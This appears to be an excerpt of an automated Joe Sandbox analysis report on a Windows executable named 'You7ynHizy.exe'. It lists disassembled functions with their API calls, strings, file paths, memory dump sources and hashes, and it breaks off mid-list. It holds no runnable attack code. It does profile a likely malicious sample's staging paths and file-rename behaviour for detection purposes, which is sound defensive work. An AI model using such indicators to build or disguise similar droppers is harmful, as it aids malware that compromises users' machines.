                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                              • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                              • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                            • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                              • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                              • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                              • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 2624150263-182501510
                                                                                            • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                            • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                            • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                            • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                            Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 542301482-1034134010
                                                                                            • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                                            • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                                            • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                                            • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                            Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                                            • GetSysColor.USER32(?), ref: 004044AD
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                            • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                            • SendMessageW.USER32(00000000), ref: 00404550
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                            • SetCursor.USER32(00000000), ref: 004045CF
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                            • SetCursor.USER32(00000000), ref: 004045EB
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: : Completed$DC@$N
                                                                                            • API String ID: 3103080414-907034273
                                                                                            • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                            • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                            • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                            • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                            • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                            • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                            • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                            Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                            • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                              • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                              • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                            • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                            • wsprintfA.USER32 ref: 00405F62
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                              • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                              • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                            • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                            • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                            • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                            Function 0040652B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\You7ynHizy.exe",00403347,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-718445130
                                                                                            • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                            • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                            • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                            • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                            Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                            • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                            • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                            • GetSysColor.USER32(?), ref: 004042FB
                                                                                            • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                            • DeleteObject.GDI32(?), ref: 00404325
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                            • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                            • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                            Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                              • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
